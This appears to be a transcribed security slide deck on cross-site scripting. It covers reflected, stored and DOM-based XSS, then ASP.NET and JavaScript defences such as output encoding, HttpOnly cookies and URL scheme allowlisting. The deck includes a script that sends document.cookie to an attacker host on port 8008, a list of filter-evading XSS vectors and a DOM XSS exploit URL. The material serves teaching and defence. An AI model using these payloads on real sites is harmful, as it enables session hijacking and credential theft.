
XSS - Attacks & Defense

This preso covers XSS in detail.

Published in: Technology

XSS - Attacks & Defense

  1. XSS – Attacks & Defense
  2. Cross Site Scripting
     • A user's credentials may be recovered by another user.
     • Inject client-side code as part of data content stored on the server side, e.g. JavaScript.
     • When a user views the stored content, the client-side code executes in the browser.
     • The code transmits the current credentials to the attacker.
  3. XSS types
     • XSS is of three types: Persistent, Non-persistent, DOM based.
  4. Non-persistent XSS
     • The application echoes the request back in its response.
     • It can be over GET or POST.
     • Very common among application developers.
     • Features like search are a common place for it.
     • Error handling routines are vulnerable to it as well.
     • The attacker can inject a stream into it.
     • Various tags can be injected.
  5. Non-persistent XSS
     • Attack vectors are common.
     • Exploitation is possible.
     • Session hijacking via cookie retrieval is the most popular use.
     • Links arriving by mail or on social sites can lead to XSS.
     • It is also known as type 1 or reflected XSS.
  6. Anatomy of an XSS attack (diagram; slides 6–10 are successive frames of it): the attacker injects <IFRAME> JavaScript into the web application. The web server's session table holds SESSION KEYS 78974369523 (username saumil) and 12323747677 (username arthur). A third user (username nitesh, SESSID=84658734652) loads the page, and the injected <iframe src=http://attacker/SESSID=84658734652> makes the victim's browser issue GET /SESSID=84658734652 HTTP/1.0 (happens automatically) to the attacker's listener on port 8008, which thereby receives SESSID=84658734652.
  11. What to inject – IFRAME example
     • Inject a 1x1 floating frame.
     • When the frame is loaded, it causes the browser to make an automatic request.
     • Requesting URL: http://192.168.7.41:8008/<cookie_value>

       <script>document.write("<iframe src='http://192.168.7.41:8008/" + document.cookie + "' width=1 height=1 frameborder=0></iframe>");</script>
  12. Persistent XSS
     • In this XSS vector the attacker gets write access to the application.
     • The application page can then be loaded with malicious code.
     • This code is accessed by the victim.
     • The code gets executed on the client machine.
     • XSS – credential stealing.
     • Examples: bulletin boards, blogs etc.
  13. Anatomy of an XSS attack (diagram; slides 13–17 repeat the five-frame sequence of slides 6–10, here for the persistent case: injected <IFRAME>, session keys 78974369523 / 12323747677 / 84658734652, the automatic GET /SESSID=84658734652 HTTP/1.0 to the attacker's port 8008).
  18. XSS injection vectors
     • Applications filter certain traffic.
     • Popular tags are filtered out as well.
     • Character filtering is in place.
     • There are various ways to inject vectors.
  19. XSS vector
     • ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
     • '';!--"<XSS>=&{()}
  20. XSS vector
     • <SCRIPT SRC=http://url/xss.js></SCRIPT>
     • <IMG SRC="javascript:alert('XSS');">
     • <IMG SRC=javascript:alert('XSS')>
     • <IMG SRC=JaVaScRiPt:alert('XSS')>
     • <IMG SRC=javascript:alert(&quot;XSS&quot;)>
     • <IMG SRC=`javascript:alert("XSS")`>
     • Image tag malformed: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  21. XSS vector
     • <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
     • Unicode encoding: <IMG SRC=javascript:a&#108;ert('X&#83;S')>
  22. XSS vector
     • UTF-8: <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  23. XSS vector
     • Hex: <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
     • XSS breakup (whitespace inside the scheme): <IMG SRC="jav ascript:alert('XSS');">
     • <IMG SRC="jav ascript:alert('XSS');">
  24. XSS vector
     • <IMG SRC="jav ascript:alert('XSS');"> (line feed)
     • <IMG SRC="jav ascript:alert('XSS');"> (carriage return)
     • Multi-line injection
  25. XSS vector
     • <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
     • <BODY BACKGROUND="javascript:alert('XSS')">
     • <BODY ONLOAD=alert('XSS')>
     • BR, Layer etc.
     • <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
     • HTTP-Equiv
  26. XSS vector
     • Iframe, Frameset & Table (background)
     • Base tag
     • Object tag XSS
     • Embed – with Flash
     • XML namespace injection
     • XML ID, SRC etc.
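Slides 18–24 make the point that tag and character blocklists miss the encoded and whitespace-broken forms of javascript: URLs. The added example below (not code from the slides) shows the defensive alternative: decode numeric character references and strip the whitespace a browser ignores, then allow only an explicit set of URL schemes. A naive substring blocklist is included only to show that it passes the encoded vectors the slides list. The helper names and the allowed-scheme set are this example's own choices.

```javascript
// Added example: allowlist a resource URL (IMG/LINK/FRAME src) after the
// same normalisation a browser performs, instead of blocklisting "javascript:".

const ALLOWED_SCHEMES = new Set(["http", "https"]);

// Decode numeric character references (&#106; &#0000106 &#x6A;), with or
// without the trailing semicolon, which browsers tolerate as well.
function decodeNumericEntities(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?/gi, (m, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Browsers drop tab, LF and CR anywhere in a URL and trim leading/trailing
// C0 controls and spaces before looking for the scheme.
function normaliseUrl(raw) {
  let s = decodeNumericEntities(raw);
  s = s.replace(/[\t\n\r]/g, "");
  s = s.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
  return s;
}

// Scheme is everything up to the first ':' if it looks like a scheme.
function extractScheme(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Relative URLs (no scheme) inherit the page's own http(s) origin and pass.
function isSafeResourceUrl(raw) {
  const scheme = extractScheme(normaliseUrl(raw));
  if (scheme === null) return true;
  return ALLOWED_SCHEMES.has(scheme);
}

// The filtering the slides describe: look for the literal substring.
function naiveBlocklistAllows(raw) {
  return !/javascript:/i.test(raw);
}
```

Run `isSafeResourceUrl` on the hex vector from slide 23 and it returns false, while `naiveBlocklistAllows` lets the same string through; the scheme check is also what makes the mixed-case and tab/newline variants on slides 20, 23 and 24 fail.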
  27. DOM based XSS
     • Ajax-based XSS is a relatively new way of attacking the client.
     • Code written for the browser end can be vulnerable to these attacks.
     • Different data structures can each introduce their own confusion.
     • Processing information from untrusted sources can lead to XSS.
  28. DOM based XSS
     • A stream can be injected into the Ajax routine.
     • If the function is vulnerable to XSS, it executes the script.
     • The script can arrive in various forms.
     • Web 2.0 applications consume various scripts, and that makes them vulnerable to this set of attacks.
  29. DOM based XSS

       <HTML>
       <TITLE>Welcome!</TITLE>
       Hi
       <SCRIPT>
       var pos = document.URL.indexOf("user=") + 5;
       document.write(document.URL.substring(pos, document.URL.length));
       </SCRIPT>
       <BR>
       Welcome to our system …
       </HTML>

  30. DOM based XSS
     • http://www.target.com/profile.html?user=Jack
     • Exploit: http://www.target.com/profile.html?user=<script>alert(document.cookie)</script>
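The greeting page on slides 29–30 is a source-to-sink flow: document.URL is the source and document.write is the sink. The added example below (not code from the slides) models that flow as pure functions so it can be tested outside a browser, placing the slide's own substring extraction next to a proper query-string parser and an HTML-encoding renderer. The function names, the `escapeHtml` helper and the `containsTag` check are this example's own.

```javascript
// Added example: the "user=" greeting of slide 29, modelled outside the DOM.

// Faithful to the slide: take everything after "user=" to the end of the URL.
// When the parameter is absent, indexOf() returns -1, so pos is 4 and the
// function returns the tail of the URL from index 4.
function userFromUrlAsOnSlide(url) {
  const pos = url.indexOf("user=") + 5;
  return url.substring(pos, url.length);
}

// Proper parsing with the URL API; "" when the parameter is missing.
function userFromUrl(url) {
  return new URL(url).searchParams.get("user") || "";
}

// Minimal HTML-body encoder for the five characters that can change
// parsing context in text content and in quoted attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: attacker-controlled text is concatenated into markup, which
// is what document.write(document.URL.substring(...)) does on the slide.
function greetingMarkupUnsafe(url) {
  return "Hi " + userFromUrlAsOnSlide(url) + "<br>";
}

// Hardened: encode before the HTML sink. In a live page the better fix is
// a text sink (element.textContent = user) instead of document.write.
function greetingMarkupSafe(url) {
  return "Hi " + escapeHtml(userFromUrl(url)) + "<br>";
}

// Does the produced fragment contain any start tag other than the page's
// own <br>? Enough to show the difference between the two renderers.
function containsTag(markup) {
  return /<[a-z][^>]*>/i.test(markup.replace(/<br>/g, ""));
}
```

With the slide-30 exploit URL, `greetingMarkupUnsafe` returns a fragment that contains a live <script> element, whereas `greetingMarkupSafe` returns the same text with its angle brackets encoded, so the browser shows it instead of running it.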
  31. Anatomy of an XSS attack (diagram): the web client loads a stream from a third-party source through a proxy; the stream is passed to eval() → XSS. The attacker's listener is again on port 8008.
  32. DOM based XSS

       if (http.readyState == 4) {
         var response = http.responseText;
         var p = eval("(" + response + ")");
         document.open();
         document.write(p.firstName + "<br>");
         document.write(p.lastName + "<br>");
         document.write(p.phoneNumbers[0]);
         document.close();
       }

  33. Anatomy of an XSS attack (diagram; slides 33–35 repeat the slide-31 diagram with the stream labelled XML, JSON and JS-Object / JS-Array / JS-Script respectively, each passed to eval() and leading to XSS).
  36. DOM based XSS – sinks
     document.write(…)
     document.writeln(…)
     document.body.innerHtml = …
     document.forms[0].action = …
     document.attachEvent(…)
     document.create…(…)
     document.execCommand(…)
     document.body. …
     window.attachEvent(…)
     document.location = …
     document.location.hostname = …
     document.location.replace(…)
     document.location.assign(…)
     document.URL = …
     window.navigate(…)
  37. DOM based XSS – sinks
     document.open(…)
     window.open(…)
     window.location.href = … (and assigning to location's href, host and hostname)
     eval(…)
     window.execScript(…)
     window.setInterval(…)
     window.setTimeout(…)
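Slide 32 builds the profile object with eval() applied to the response body, and slides 36–37 list eval() among the sinks. The added example below (not code from the slides) puts the slide's eval-based parser next to a JSON.parse-based one and feeds both a response that is valid JavaScript but not JSON: the eval version executes it while producing an object, the JSON.parse version throws. Both response bodies are constructed for the example; the `__evalRan` marker and the function names are its own.

```javascript
// Added example: parsing an Ajax response with eval() (as on slide 32)
// versus JSON.parse(). Sample responses are constructed for this example.

const GOOD_RESPONSE =
  '{"firstName":"Jack","lastName":"Smith","phoneNumbers":["555-0100"]}';

// Valid JavaScript expression that yields an object, so eval() accepts it,
// but evaluating it also runs the function body (here it only sets a flag).
const HOSTILE_RESPONSE =
  '(function(){ globalThis.__evalRan = true; ' +
  'return {"firstName":"Jack","lastName":"","phoneNumbers":[]}; })()';

// As on the slide: wrap in parentheses and eval.
function parseProfileWithEval(responseText) {
  return eval("(" + responseText + ")");
}

// Hardened: strict JSON parsing plus a shape check. JSON.parse throws a
// SyntaxError on anything that is not JSON, so code can never run here.
function parseProfile(responseText) {
  const p = JSON.parse(responseText);
  if (typeof p !== "object" || p === null || Array.isArray(p)) {
    throw new TypeError("profile must be a JSON object");
  }
  for (const k of ["firstName", "lastName"]) {
    if (typeof p[k] !== "string") throw new TypeError(k + " must be a string");
  }
  if (!Array.isArray(p.phoneNumbers)) throw new TypeError("phoneNumbers must be an array");
  return p;
}

// Did parsing execute code from the response? Reset the marker, parse, report.
function executesCode(parser, responseText) {
  globalThis.__evalRan = false;
  try { parser(responseText); } catch (e) { /* rejected input counts as "no" */ }
  return globalThis.__evalRan === true;
}

// Does the parser reject this response by throwing?
function rejectsInput(parser, responseText) {
  try { parser(responseText); return false; } catch (e) { return true; }
}
```

Note that a correctly parsed object is still untrusted data: `p.firstName` written with document.write, as on slide 32, reintroduces the HTML sink, so the parsed fields still need output encoding or a text sink such as textContent.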
  38. Exploit and testing frameworks
     • There are testing frameworks for XSS which can be used during testing.
     • CAL9000 – OWASP project
     • BeEF – Browser Exploitation Framework
     • XSSproxy
     • A few others are out there.
  39. Securing XSS
  40. Prevent XSS
     • Design strategy
     • Validate input.
     • Encode output variable data.
     • Sanitize free-format input.
     • Set the correct character encoding.
     • Use the ASP.NET validateRequest option.
     • Use the HttpOnly cookie option.
     • Use the <frame> security attribute.
     • Use the innerText property.
  41. Prevent XSS
     • Encode output using the HtmlEncode / UrlEncode methods.
     • Do this whether the data comes from user input, a database, or a local file. The HtmlEncode method replaces characters that have special meaning in HTML with the HTML entities that represent those characters. For example, < is replaced with &lt; and " is replaced with &quot;. Encoded data does not cause the browser to execute code; instead, the data is rendered as harmless HTML.

       Response.Write(HttpUtility.HtmlEncode(Request.Form["name"]));

  42. Prevent XSS
     • Data-bound controls: DataGrid, DataList, RadioButtonList and CheckBoxList do not perform encoding.
     • Turn all columns into templates and manually call HtmlEncode()/UrlEncode() on each DataBinder.Eval result.
     • Or override one of the control's data-binding methods, such as OnDataBinding or OnItemDataBound, and encode its items there.
  43. Prevent XSS
     • Allow safe HTML in places like comments and blog fields:
     • Process the input with HtmlEncode.
     • Then undo the encoding on a selected set of safe HTML tags.

       StringBuilder sb = new StringBuilder(HttpUtility.HtmlEncode(userInput));
       sb.Replace("&lt;b&gt;", "<b>");
       sb.Replace("&lt;/b&gt;", "</b>");
       sb.Replace("&lt;i&gt;", "<i>");
       sb.Replace("&lt;/i&gt;", "</i>");
       Response.Write(sb.ToString());
  44. Prevent XSS
     • Set the correct character encoding at application or page level:

       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />

       OR

       <%@ Page ResponseEncoding="ISO-8859-1" %>

     • To set the character encoding in Web.config, use the following configuration:

       <configuration>
         <system.web>
           <globalization requestEncoding="ISO-8859-1" responseEncoding="ISO-8859-1"/>
         </system.web>
       </configuration>

  45. Prevent XSS
     • Validating Unicode characters:

       using System.Text.RegularExpressions;

       private void Page_Load(object sender, System.EventArgs e)
       {
           // Name must contain between 1 and 40 alphanumeric characters
           // together with (optionally) special characters '`' for names such
           // as D'Angelo
           if (!Regex.IsMatch(Request.Form["name"], @"^[\p{L}\p{Zs}\p{Lu}\p{Ll}']{1,40}$"))
               throw new ArgumentException("Invalid name parameter");
       }

     • {<name>} specifies a named Unicode character class.
     • \p{<name>} matches any character in the named character class specified by {<name>}.
     • {L} performs a left-to-right match.
     • {Lu} performs a match of uppercase.
     • {Ll} performs a match of lowercase.
     • {Zs} matches separator and space.
     • {1,40} means no less than 1 and no more than 40 characters.
     • {Mn} matches mark and non-spacing characters.
     • * specifies zero or more matches.
     • $ means stop looking at this position.
  46. Prevent XSS
     • Use the ASP.NET validateRequest option.
     • By default it is TRUE.
     • It instructs ASP.NET to check for malicious inputs like <script>, etc.

       <%@ Page validateRequest="True" %>
  47. Prevent XSS
     • Use the HttpOnly cookie option.
     • It prevents client-side script from accessing the cookie through the document.cookie property.

       protected void Application_EndRequest(Object sender, EventArgs e)
       {
           string authCookie = FormsAuthentication.FormsCookieName;
           foreach (string sCookie in Response.Cookies)
           {
               if (sCookie.Equals(authCookie))
               {
                   // Force HttpOnly to be added to the cookie header by appending it
                   // to the Path attribute (the .NET 1.1 technique; from .NET 2.0 the
                   // HttpCookie.HttpOnly property, or <httpCookies httpOnlyCookies="true"/>
                   // in web.config, sets the flag directly)
                   Response.Cookies[sCookie].Path += ";HttpOnly";
               }
           }
       }

  48. Prevent XSS
     • Use the <frame> security attribute.
     • Use the innerText property instead of the innerHTML property.

       <frame security="restricted" src="http://www.somesite.com/somepage.htm"></frame>

  49. Prevent XSS
     • Use the AntiXSS library:

       // bad code
       String Name = Request.QueryString["Name"];

       // code with the AntiXSS library
       String Name = AntiXss.HtmlEncode(Request.QueryString["Name"]);

       namespace Microsoft.Security.Application
       {
           public class AntiXss
           {
               public static string HtmlEncode(string s);
               public static string HtmlAttributeEncode(string s);
               public static string JavaScriptEncode(string s);
               public static string UrlEncode(string s);
               public static string VisualBasicScriptEncode(string s);
               public static string XmlEncode(string s);
               public static string XmlAttributeEncode(string s);
           }
       }
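Slide 41 describes output encoding, slide 43 the encode-then-restore-safe-tags approach, and slide 49 lists one AntiXSS encoder per output context. The added example below (not the AntiXSS library's code, nor code from the slides) shows the principle behind that API in JavaScript: an allowlist encoder that turns everything outside a small safe set into a numeric entity or escape appropriate to its context, with the same untrusted value rendered into HTML body, attribute, JavaScript-string and URL contexts. The safe-character set, the space handling in the attribute encoder, `renderProfile` and `allowSafeTags` are this example's own choices.

```javascript
// Added example: allowlist-based, context-specific output encoders in the
// style of the AntiXss class, plus the slide-43 "restore safe tags" step.

// Characters allowed through unencoded in HTML body context.
const SAFE = /[A-Za-z0-9 ,.\-_]/;

// Apply enc() to every character outside the safe set.
function encodeBy(s, enc, safe = SAFE) {
  let out = "";
  for (const c of s) out += safe.test(c) ? c : enc(c);
  return out;
}

// HTML body text: decimal numeric entity for every character outside SAFE.
function htmlEncode(s) {
  return encodeBy(s, (c) => "&#" + c.codePointAt(0) + ";");
}

// HTML attribute value: same, but space is encoded too, so even an unquoted
// attribute cannot be terminated by the data (this example's choice).
function htmlAttributeEncode(s) {
  return encodeBy(s, (c) => "&#" + c.codePointAt(0) + ";", /[A-Za-z0-9,.\-_]/);
}

// JavaScript string literal: \xHH / \uHHHH escapes, never HTML entities,
// because the HTML parser does not entity-decode <script> content.
// "</script>" becomes \x3C\x2Fscript\x3E and cannot close the element.
function javaScriptEncode(s) {
  return encodeBy(s, (c) => {
    const hex = c.codePointAt(0).toString(16).toUpperCase();
    if (hex.length <= 2) return "\\x" + hex.padStart(2, "0");
    if (hex.length <= 4) return "\\u" + hex.padStart(4, "0");
    return "\\u{" + hex + "}";   // astral code point, ES2015 literal syntax
  });
}

// URL query component: percent-encoding.
function urlEncode(s) {
  return encodeURIComponent(s);
}

// The same untrusted value in four contexts, each with its own encoder.
function renderProfile(name) {
  return [
    "<span>" + htmlEncode(name) + "</span>",
    '<input value="' + htmlAttributeEncode(name) + '">',
    '<script>var n = "' + javaScriptEncode(name) + '";</script>',
    '<a href="/profile?user=' + urlEncode(name) + '">profile</a>',
  ].join("\n");
}

// Slide 43's approach with this encoder: encode everything, then restore a
// fixed allowlist of tags. '<' is &#60; '>' is &#62; '/' is &#47;.
function allowSafeTags(userInput) {
  let s = htmlEncode(userInput);
  for (const t of ["b", "i"]) {
    s = s.split("&#60;" + t + "&#62;").join("<" + t + ">");
    s = s.split("&#60;&#47;" + t + "&#62;").join("</" + t + ">");
  }
  return s;
}
```

The allowlist approach differs from the five-character denylist encoder in that any character not proven harmless is encoded, so a new browser parsing quirk does not turn an unencoded character into a break-out; the cost is heavier output, which is why the safe set includes the common punctuation in names and sentences.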
  50. Conclusion
